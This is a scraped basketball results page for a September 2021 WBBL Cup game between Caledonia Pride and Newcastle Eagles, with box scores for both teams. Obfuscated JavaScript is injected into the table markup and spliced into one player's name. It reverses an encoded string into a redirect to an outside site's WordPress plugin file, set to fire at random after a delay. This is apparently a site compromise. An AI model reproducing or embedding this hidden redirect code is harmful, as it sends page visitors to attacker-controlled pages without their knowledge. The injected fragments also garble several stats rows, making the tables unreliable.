Breaking news
  1. Highlights & Pictures
  2. Highlights: Queens v Pride
  3. Highlights & Pictures: Pride v Riders
  4. Highlights: Wolves v Pride
  5. Highlights & Pictures: Pride v Wolves
WBBL Cup 25th September 2021 - 3:00 pm
Durham Palatinates

Recap

Details

Date Time League Season Full Time
25th September 2021 3:00 pm WBBL Cup 2021/22 40'

Venue

Durham Palatinates
The Sports and Wellbeing Park, Durham, County Durham, North East England, England, DH1 3SE, United Kingdom

Results

Team1234T
Caledonia Pride410201650
Newcastle Eagles1822192584

Caledonia Pride

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
4Maud RangerGuard171222072429.21812.52450.0392
5Sian PhillipsForward151102141233.300071258.3563
50Eabha KerrForward1050004850.01333.31250.0235
25Elise TweedieCenter742051520.00005683.3222
27Zoe SharpeGuard10010020.0010.01250.0004
16Aoife LoftusForward02100000000000021
7Jenni TorranceGuard01000020.0000000010
17Luisa VelázquezGuard00000000000000001
6Rose HarveyGuard01200020.0000000014
9Sofia AmisForward02000000000020.0021
22Sophie LoughranForward00020010.0010.0000001
8Taryn CumminsGuard03010040.0010.0000125
 Total 5041786166026.721414.3162857.11328029

Newcastle Eagles

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
4M. McVicar-22172081457.13650.03475.0104
10E. Hor$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}ton-13301051050.02450.01250.0123
7J. Eadsforth-Yaytes-1224104850.03650.01250.0020
0D. Cipcic-1154104850.011100.022100.0231
9A. Lowe-927403933.31520.02366.7113
3C. Gaynor-740033475.00001250.0040
8R. Bland-441002540.0010.0000130
13A. Popovic-37210040.00003475.0250
5M. Fernandez Pardo-33010070.0030.03650.0210
33C. Clasen-02200000000000022
11N. Kelshaw-01210010.0000000011
14O. Chukwu-Etu-01110020.0010.0000010
 Total 843530133297240.3102737.0162564.01025014